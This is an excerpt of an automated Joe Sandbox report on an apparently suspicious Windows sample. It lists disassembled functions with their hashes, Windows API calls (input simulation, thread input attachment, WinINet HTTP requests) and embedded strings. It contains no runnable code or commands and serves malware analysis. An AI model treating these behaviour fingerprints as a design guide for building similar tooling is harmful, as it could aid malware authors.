                                                                                                                                                • Opcode ID: 404d70c2d470ccb1ceac9fc28e764da4368c8612beaf6e01b9a8fe9ab5cdfe2b
                                                                                                                                                • Instruction ID: 2f42cba97a43a57ca04bc58c18194c10c7a81600b961a50d92069030cc746e98
                                                                                                                                                • Opcode Fuzzy Hash: 404d70c2d470ccb1ceac9fc28e764da4368c8612beaf6e01b9a8fe9ab5cdfe2b
                                                                                                                                                • Instruction Fuzzy Hash: 0F31C339A216159FD710EF68C488AAABBF4FF45305F148066E405CB3D2DB71DDA6CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetCurrentThreadId.KERNEL32(?,?,?,?,?,0027A1E1,?,00000001), ref: 0027B151
                                                                                                                                                • GetForegroundWindow.USER32 ref: 0027B165
                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 0027B16C
                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0027B17B
                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0027B18D
                                                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0027B1A6
                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0027B1B8
                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000), ref: 0027B1FD
                                                                                                                                                • AttachThreadInput.USER32(?,?,00000000), ref: 0027B212
                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0027B21D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2156557900-0
                                                                                                                                                • Opcode ID: 3973b16c8e758c2e127850fe09b721588ebf2d06ad5ccef3713e8a8f6c44360e
                                                                                                                                                • Instruction ID: 2c901eec3646fb88692186d3117fc542baac676b1777228e82962cdfafffb2c1
                                                                                                                                                • Opcode Fuzzy Hash: 3973b16c8e758c2e127850fe09b721588ebf2d06ad5ccef3713e8a8f6c44360e
                                                                                                                                                • Instruction Fuzzy Hash: CD31CE71560209BFDB12DF24EC8CB6E7BADBB51312F208414FA08DB191DBB49E008F60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 00242C94
                                                                                                                                                  • Part of subcall function 002429C8: HeapFree.KERNEL32(00000000,00000000), ref: 002429DE
                                                                                                                                                  • Part of subcall function 002429C8: GetLastError.KERNEL32(00000000,?,0024D7D1,00000000,00000000,00000000,00000000,?,0024D7F8,00000000,00000007,00000000,?,0024DBF5,00000000,00000000), ref: 002429F0
                                                                                                                                                • _free.LIBCMT ref: 00242CA0
                                                                                                                                                • _free.LIBCMT ref: 00242CAB
                                                                                                                                                • _free.LIBCMT ref: 00242CB6
                                                                                                                                                • _free.LIBCMT ref: 00242CC1
                                                                                                                                                • _free.LIBCMT ref: 00242CCC
                                                                                                                                                • _free.LIBCMT ref: 00242CD7
                                                                                                                                                • _free.LIBCMT ref: 00242CE2
                                                                                                                                                • _free.LIBCMT ref: 00242CED
                                                                                                                                                • _free.LIBCMT ref: 00242CFB
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 46924c189278898ad1df68b71763328b3861e1bc91818ec61a58d9b624b77045
                                                                                                                                                • Instruction ID: eea809b0cc66291a78e1f970bd6378901741b70bdb17fba240eb77d6c10369c6
                                                                                                                                                • Opcode Fuzzy Hash: 46924c189278898ad1df68b71763328b3861e1bc91818ec61a58d9b624b77045
                                                                                                                                                • Instruction Fuzzy Hash: C811D776120108EFDB0AEF56D882CDD3BA5FF05350FA154A1F9489F222DA31EE649F90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                • Opcode ID: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
                                                                                                                                                • Instruction ID: 5ad32a276c032faefbe04b5f0bd4598d7dfd6af6ae24e6736f500628c757e9b1
                                                                                                                                                • Opcode Fuzzy Hash: b89e3fc481ae3e176462e99b8a7668b8f79c4b48a0d814554b3974eba80e6475
                                                                                                                                                • Instruction Fuzzy Hash: 35117476540209AFCB01EF54EA81CDD3BA6EF05350B5189A5FA0C9F2A1DE31EE51AF80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen
                                                                                                                                                • String ID: [L$[L
                                                                                                                                                • API String ID: 176396367-175131883
                                                                                                                                                • Opcode ID: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
                                                                                                                                                • Instruction ID: fca41943caa189037ef2d8d9438c6cb9e3e76cf1015f3e5b9cd69337801882ac
                                                                                                                                                • Opcode Fuzzy Hash: 52fb84ed20a601a6362a334e9d3866de97d3c6e346f7c12375178c5f42add9b6
                                                                                                                                                • Instruction Fuzzy Hash: 80E1C532A00616ABCB25DF78C890BEDFBB5BF44754F54811AF956A7240EF30AD85CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00211459
                                                                                                                                                • OleUninitialize.OLE32 ref: 002114F8
                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 002116DD
                                                                                                                                                • DestroyWindow.USER32 ref: 002524B9
                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0025251E
                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0025254B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                • String ID: close all
                                                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                                                • Opcode ID: 1ba92c504c1b142c3caefbda532d930a4fe3f79f8b0ae3cdf999e604b0454707
                                                                                                                                                • Instruction ID: b41c93daa9cdd087f747ec850bb0df38dd3aea529df270c077a6685c79dbaac2
                                                                                                                                                • Opcode Fuzzy Hash: 1ba92c504c1b142c3caefbda532d930a4fe3f79f8b0ae3cdf999e604b0454707
                                                                                                                                                • Instruction Fuzzy Hash: 4FD1BD30721222CFCB19EF14C599B69F7A4BF16700F6441ADE94A6B291DB30AC7ACF54
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002835E4
                                                                                                                                                  • Part of subcall function 00219CB3: _wcslen.LIBCMT ref: 00219CBD
                                                                                                                                                • LoadStringW.USER32(002E2390,?,00000FFF,?), ref: 0028360A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LoadString$_wcslen
                                                                                                                                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                • API String ID: 4099089115-2391861430
                                                                                                                                                • Opcode ID: 673a2aa1e3819ab5320e60ca8e90c3d67cdfc93964297bd1c04e229cf3d5f28f
                                                                                                                                                • Instruction ID: 98b4fa43ce8498514833782787af54bdb1df3d01f5a80b13daf492a67c03593a
                                                                                                                                                • Opcode Fuzzy Hash: 673a2aa1e3819ab5320e60ca8e90c3d67cdfc93964297bd1c04e229cf3d5f28f
                                                                                                                                                • Instruction Fuzzy Hash: DE517E7182021ABBDF14EBA0DC56EEDBBB9AF14700F144165F505721A1EB316AF8DFA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0028C272
                                                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0028C29A
                                                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0028C2CA
                                                                                                                                                • GetLastError.KERNEL32 ref: 0028C322
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 0028C336
                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0028C341
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3113390036-3916222277
                                                                                                                                                • Opcode ID: 50f2ac6457385d75fb14a89481bd431812a9f9a93e3b1c4cf6e15828ba905874
                                                                                                                                                • Instruction ID: 9804872516586de4611a37524fc117a4f8070fbe06d929b7b67356fdec7116ae
                                                                                                                                                • Opcode Fuzzy Hash: 50f2ac6457385d75fb14a89481bd431812a9f9a93e3b1c4cf6e15828ba905874
                                                                                                                                                • Instruction Fuzzy Hash: C331A0B5521304AFD721AF649C88ABB7BFCEB49744F24855EF446D2280DB34DD158B70
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32 ref: 002720AB
                                                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 002720C0
                                                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0027214D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassMessageNameParentSend
                                                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                • API String ID: 1290815626-3381328864
                                                                                                                                                • Opcode ID: a54e8c57668178fe618a0f53269586cb17aa08ade22b8293f07674753c3372a7
                                                                                                                                                • Instruction ID: c817897e8d6673a4c98d478f42678a2aa4877db001d4428c1280e7314c8ec838
                                                                                                                                                • Opcode Fuzzy Hash: a54e8c57668178fe618a0f53269586cb17aa08ade22b8293f07674753c3372a7
                                                                                                                                                • Instruction Fuzzy Hash: 1F113A762B8317FAF6017620EC0ADA6339CEB06724F304017FB0CA40D2EEB16C355A14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1282221369-0
                                                                                                                                                • Opcode ID: b3a8e7a9c89a2d1f958e2f487b004ba14730d653e62d6a483347a7079d47aa67
                                                                                                                                                • Instruction ID: 476647abcf2a1ae80c775624b67a74ba86af72bbe1b1599f1874fa7c4083f86a
                                                                                                                                                • Opcode Fuzzy Hash: b3a8e7a9c89a2d1f958e2f487b004ba14730d653e62d6a483347a7079d47aa67
                                                                                                                                                • Instruction Fuzzy Hash: 9D618A71925202AFDB2DAFB9ECC5A6D7B95EF01310F25016FF9009B241DB759C298BA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 002A5186
                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 002A51C7
                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 002A51CD
                                                                                                                                                • SetFocus.USER32 ref: 002A51D1
                                                                                                                                                  • Part of subcall function 002A6FBA: DeleteObject.GDI32(00000000), ref: 002A6FE6
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 002A520D
                                                                                                                                                • SetWindowLongW.USER32 ref: 002A521A
                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 002A524D
                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 002A5287
                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 002A5296
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3210457359-0
                                                                                                                                                • Opcode ID: aee1f175c63d25fe4187c3b4106ec19a8f7e1e2b5c4f988466c1463a29b1c4f8
                                                                                                                                                • Instruction ID: 1d3b0e9bc3c2652796329acdeff7ed6613ae9201834bec77bdc8d42c31aa4a7e
                                                                                                                                                • Opcode Fuzzy Hash: aee1f175c63d25fe4187c3b4106ec19a8f7e1e2b5c4f988466c1463a29b1c4f8
                                                                                                                                                • Instruction Fuzzy Hash: 2051B330A70A29BFEF249F24DC49BEA7B65EB06320F144011FA19962E1CF7599A0DF40
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadImageW.USER32 ref: 00266890
                                                                                                                                                • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002668A9
                                                                                                                                                • LoadImageW.USER32 ref: 002668B9
                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002668D1
                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002668F2
                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00228874,00000000,00000000,00000000,000000FF,00000000), ref: 00266901
                                                                                                                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0026691E
                                                                                                                                                • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00228874,00000000,00000000,00000000,000000FF,00000000), ref: 0026692D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1268354404-0
                                                                                                                                                • Opcode ID: f0f865cd53de4b730209d1bafc95415dddbb14207f6184e9ddf8e1b7f1638b0b
                                                                                                                                                • Instruction ID: 8d36efa06e05671b39732c864bc495474f4ae5071d7fe535d41f6fd9881bdd92
                                                                                                                                                • Opcode Fuzzy Hash: f0f865cd53de4b730209d1bafc95415dddbb14207f6184e9ddf8e1b7f1638b0b
                                                                                                                                                • Instruction Fuzzy Hash: C0519B70620206EFDB20CF64EC99FAA7BB5EB58754F10452CF906D72A0DB70E9A0DB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0028C182
                                                                                                                                                • GetLastError.KERNEL32 ref: 0028C195
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 0028C1A9
                                                                                                                                                  • Part of subcall function 0028C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0028C272
                                                                                                                                                  • Part of subcall function 0028C253: GetLastError.KERNEL32 ref: 0028C322
                                                                                                                                                  • Part of subcall function 0028C253: SetEvent.KERNEL32(?), ref: 0028C336
                                                                                                                                                  • Part of subcall function 0028C253: InternetCloseHandle.WININET(00000000), ref: 0028C341
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 337547030-0
                                                                                                                                                • Opcode ID: b489d932794907c3e4d5cbba88b157877c79ce5f5c42af101c7f3965ddd55a2a
                                                                                                                                                • Instruction ID: aa4b79d1e37300ad84ab0958fd749cbe2d99e71ca01805045c59f0857aec250c
                                                                                                                                                • Opcode Fuzzy Hash: b489d932794907c3e4d5cbba88b157877c79ce5f5c42af101c7f3965ddd55a2a
                                                                                                                                                • Instruction Fuzzy Hash: E5318275111701AFDB21AFB5EC48A66BBF8FF59300B24841EF95682694DB31E8249F70
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00273A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00273A57
                                                                                                                                                  • Part of subcall function 00273A3D: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000,?,002725B3), ref: 00273A5E
                                                                                                                                                  • Part of subcall function 00273A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00273A65
                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 002725BD
                                                                                                                                                • PostMessageW.USER32 ref: 002725DB
                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002725DF
                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 002725E9
                                                                                                                                                • PostMessageW.USER32 ref: 00272601
                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00272605
                                                                                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 0027260F
                                                                                                                                                • PostMessageW.USER32 ref: 00272623
                                                                                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00272627
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
